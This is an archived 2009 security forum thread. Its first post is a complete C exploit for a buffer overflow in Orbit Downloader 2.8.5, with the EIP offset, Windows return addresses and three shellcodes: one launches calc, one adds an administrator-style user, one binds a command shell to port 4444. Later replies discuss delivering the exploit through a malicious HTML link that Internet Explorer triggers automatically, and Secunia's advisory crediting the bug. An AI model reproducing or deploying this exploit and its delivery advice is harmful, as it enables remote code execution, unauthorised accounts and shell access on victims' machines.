Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 12:15

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 8 posts ] 
Author Message
 Post subject: 0day Orbit dw
PostPosted: 03 Feb 2009 01:53 

Joined: 03 Feb 2009 01:40
Posts: 31
Hello I'm Florin ,I study at the Computer Science University from Bucharest and my interests are programming (ONLY C and asm), diassembly , specializing in Unix systems ,low analysis , algorithms etc.Strictly software oriented ,no hardware.
Would appreciate if someone would give some help or ideas in how to execute code remotly in this particular case.
Love the work of this website, keep it goin' Aluigi :P ,I'm a big fan.
Dw a demo video from here
http://rapidshare.com/files/188952557/o ... t.avi.html

Code:
/*0day orbit_expl.c*/
/*Orbit Downloader V2.8.5 Malformed URL Buffer Overflow Exploit*/
/*Bug found by fl0 fl0w ,exploit programmed by fl0 fl0w*/

/*Click NEW and copy paste each line into the URL field.
  Important copy paste one line at the time cause it wouln't allow you to copy more than 100 caracters at
  once,so be patient.
***************************SPRAY THE STACK*****************************************************************
*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     *
*CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC     *
*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB     *
*DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD     *
*FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF     *
*LVVBXUUXXGGGMMMMGGTGGJJJJJJGYGGEEEEEEGRGGGGGGGGGOGGGGGGGGGLGGGGGGGGGZGGGGGGGGGAGGGGGGGGGSGGGGGGGGGCC     *
*        10        20         30        40        50        60        70        80        90        100   *
*TTTTXAAXTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT     *
*   |EIP| = 504 bytes offset                                                                              *
*                                                                                                         *
*URL STRUCTURE                                                                                          *
* http://www. + [604 * NOP(0X90)] + [NEW EIP(JMP ESP)] +[SHELLCODE] + [0X00(1 * NULL BYTE)]               *
***********************************************************************************************************
EAX 00000001
ECX 46464646 ->overwriten
EDX 7C90E4F4 ntdll.KiFastSystemCallRet
EBX 00BD3AD0
ESP 0140F574 ASCII "XGGGMMMMGGTGGJJJJJJGYGGEEEEEEGRGGGGGGGGGOGGGGGGGGGLGGGGGGGGGZGGGGGGGGGAGGGGGGGGGSGGGGGGGGGCC:80"
EBP 00BD3AF0
ESI 00BD4020
EDI 00CC4360 download.00CC4360
EIP 58555558 ->overwriten

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define SIZE 10000
#define OFFSET 504

void file (char * , char *);
void write (char *, int ,char *);
void print ();
void usage (char *);
void target ();
                   /*tnx Metasploit for Shellcodes*/
//LAUNCH CALC.EXE   
                            char shellcode_1[] =
                                               "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
                                               "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
                                               "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
                                               "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
                                               "\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
                                               "\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
                                               "\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
                                               "\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
                                               "\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
                                               "\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
                                               "\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
                                               "\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
                                               "\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
                                               "\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
                                               "\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
                                               "\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
                                               "\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
                                               "\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
                                               "\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
                                               "\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
                                               "\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
                                                                                                                                            "\x70\x63";

//ADD USER
                                                char shellcode_2[ ]=
                                                                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                                                                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                                                                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                                                                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                                                                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                                                                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                                                                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                                                                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                                                                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                                                                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                                                                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                                                                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                                                                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                                                                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                                                                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                                                                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                                                                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                                                                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                                                                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                                                                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                                                                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
                                                                    "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";

//REVERSE CMD SHELL ->BIND PORT
                              char shellcode_3[] =
                                                  "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                                                  "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                                                  "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                                                  "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                                                  "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                                                  "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                                                  "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                                                  "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                                                  "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                                                  "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                                                  "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                                                  "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                                                  "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                                                  "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                                                  "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                                                  "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                                                  "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                                                  "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                                                  "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                                                  "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                                                  "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
                                                  "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
             struct {
         char *OS;
         unsigned int EIP;       
         }
Retcodes [] = { { "Microsoft Windows Pro sp3 English:", 0x7C8369F0 },/*call esp */
               { "Microsoft Windows Pro sp3 English:", 0x7C86467B },   /*jmp esp */
               { "\t\t\t  UNIVERSAL_1:", 0x1008E153 },   
               { "\t\t\t  UNIVERSAL_2:", 0x219FB9B }, 
               { "Windows 2000 5.0.1.0 SP1 (IA32) English:", 0x69952208 }, /*jmp esp*/
               { "sss", 0x7C868667} ,
             }, t;

int main(int argc, char *argv[])
   {
      int X, shell ;     
      char *L, *Z;
      char *actbuff; 
     actbuff = (char *)malloc(SIZE);
          if (argc < 3) {
                       system("cls");
                       printf("***********************************************************************\n");
                       print ();
                       usage (argv[0]);   
                       Sleep(1000);
                       printf("\n\n");
                       printf("\t\t\t\tTargets\n");
                       target();
                       printf("************************************************************************\n");
                                     exit (0);   
             }
 
                     
   L = argv[0];         
   Z = argv[1];         
   shell = atoi(argv[2]);           
   write (actbuff, shell, Z);
   file (argv[3], actbuff);
   print();
   printf("Loading ...");
   Sleep(3000);
                  printf ("File build succesfully\n");
 
   return 0;   
}   
  void target()
  {
   int i;
for (i = 0; i < sizeof(Retcodes)/sizeof(t); i++)
          printf("> %d %s <0x%.8x> \n", i, Retcodes[i].OS, Retcodes[i].EIP);
       }
void file (char *filename, char *buff)
{
    FILE *f;
 
        if ((f = fopen(filename, "wb")) == NULL) {
          printf("Error writing file\n");
                        exit(0);                     
         } 
   fwrite (buff, 1 , strlen(buff), f);
   free (buff); 
   fclose (f);
      } 
     
void write (char *buffer, int shellc_type, char *Y)

    unsigned int offset = 0;
   
   unsigned int RET = Retcodes[atoi(Y)].EIP;
    memset (buffer ,0x90, SIZE);
    offset = OFFSET;
    memcpy (buffer + offset, &RET, 4); offset += 4;
    switch (shellc_type) {
                        case 1:
                                 memcpy (buffer + offset ,shellcode_1, strlen(shellcode_1)); offset += strlen(shellcode_1);
                                 memset (buffer + offset, 0x00, 1); 
                                        break;
                                 case 2:
                                        memcpy (buffer + offset ,shellcode_2, strlen(shellcode_2)); offset += strlen(shellcode_2);
                                        memset (buffer + offset, 0x00, 1);   
                                               break;
                                        case 3:
                                                memcpy (buffer + offset ,shellcode_3, strlen(shellcode_3)); offset += strlen(shellcode_3);
                                                memset (buffer + offset, 0x00, 1);                     
                                                       break;
             } 
   
      }     
    void usage(char *K)
    {
     printf ("Usage is: %s [target] [shell_type] [filename].txt\n", K);   
     fputs (
            "\t\tRetaddress for your version of Windows\n"
            "\t\tShell_type is the type of shellcode you want to run\n"
            "\t\t\t *Press 1 To Run CALC.EXE\n"
            "\t\t\t *Press 2 To Add User\n"
            "\t\t\t *Press 3 To Bind Shell to Port 4444\n" 
            "\t\tExample\n"
            "\t\t\torbit_expl.exe 0 3 file.txt\n"
    ,stdout);
         } 
  void print()
  {
    fputs(
          "\t\tOrbit Downloader V2.8.5 Malformed URL Buffer Overflow Exploit\n"
          "\t\tby fl0 fl0w\n"
          "\t\tContact: flo_flow_supremacy@yahoo.com\n"
          "\n", stdout); 
       }
         
       
 


Top
 Profile  
 
 
 Post subject: Re: 0day Orbit dw
PostPosted: 03 Feb 2009 04:21 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
from the video is clear that code execution is possible so I think you refer to the attack scenario, right?
in that case the best solution seems the classical "link" in a html page like the one I have attached to the post.

in Internet Explorer the exploiting is automatic when the link is pressed and I bet this operation can be even automated with javascript (no luck using http-equiv=Refresh).

instead in Firefox this is not possible because Orbit doesn't monitor the urls like in IE (this is what seems here) so "Download by Orbit (X)" must be manually selected by the user.

then Orbit isn't assigned to a specific url handler and has no extensions registered (.olt, .ob! and .metalink are not assigned) so I don't see other scenarios


Attachments:
orbit_test.zip [197 Bytes]
Downloaded 101 times
Top
 Profile  
 
 Post subject: Re: 0day Orbit dw
PostPosted: 03 Feb 2009 15:39 

Joined: 03 Feb 2009 01:40
Posts: 31
I've considered javascript page.... I couldn't make it run ,if you open the orbit_test page orbit launches but nothing happens just crashes(mm I might know why).
There is some other thing that happens ,if you write [http://www.] and copy paste long string it works , if I copy paste the entire line meaning http://www.long string it doesen't work anymore.


Top
 Profile  
 
 Post subject: Re: 0day Orbit dw
PostPosted: 03 Feb 2009 18:17 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
a crash? it's just the buffer-overflow you found with EIP 0x61616161
the only problem I see is with the chars major than 0x7f, you need to find a 100% alphanumeric return address and shellcode.

in the meantime I check if I can find a solution to both eip and scode


Top
 Profile  
 
 Post subject: Re: 0day Orbit dw
PostPosted: 25 Feb 2009 16:56 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
uhmmm today Secunia has released an advisory about a bug which looks exactly like the one you found almost one month ago:

http://secunia.com/advisories/33843

I have sent them a feedback web form about 3 hours ago about this matter but no reply yet.

just now I have also noticed that you have released a video on youtube about this problem 2 weeks ago (showing that wrong way to test the bug) but obviously youtube is not a known security mailing-list/website so it's logical that nobody has seen and indexed this vulnerability before.

*EDIT*: after an additional search I have seen that you reported the bug also on Packetstorm which IS a security website and also other websites so it's too much "strange" that it has not been seen


Top
 Profile  
 
 Post subject: Re: 0day Orbit dw
PostPosted: 26 Feb 2009 13:43 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
..or maybe they saw it and just copied it :)


Top
 Profile  
 
 Post subject: Re: 0day Orbit dw
PostPosted: 26 Feb 2009 15:19 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
no, definitely not that.

anyway after over one day from the feedback I sent to them without having received a reply the only thing to which I can think is that they have intentionally ignored the public report made by flo flow... anyway this is not my problem, I simply wanted to show this strange fact because I was aware of this bug.


Top
 Profile  
 
 Post subject: Re: 0day Orbit dw
PostPosted: 26 Feb 2009 23:51 

Joined: 03 Feb 2009 01:40
Posts: 31
Well what can you do , I don't care to mutch about secunia , or others , I would have been offended if Microsoft would had done it :p.
I've been busy with school and saw just now the replys .
I'll share other stuff as also with you guys to prove my talent.. :) . Tnx aluigi for the initiative.


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 8 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: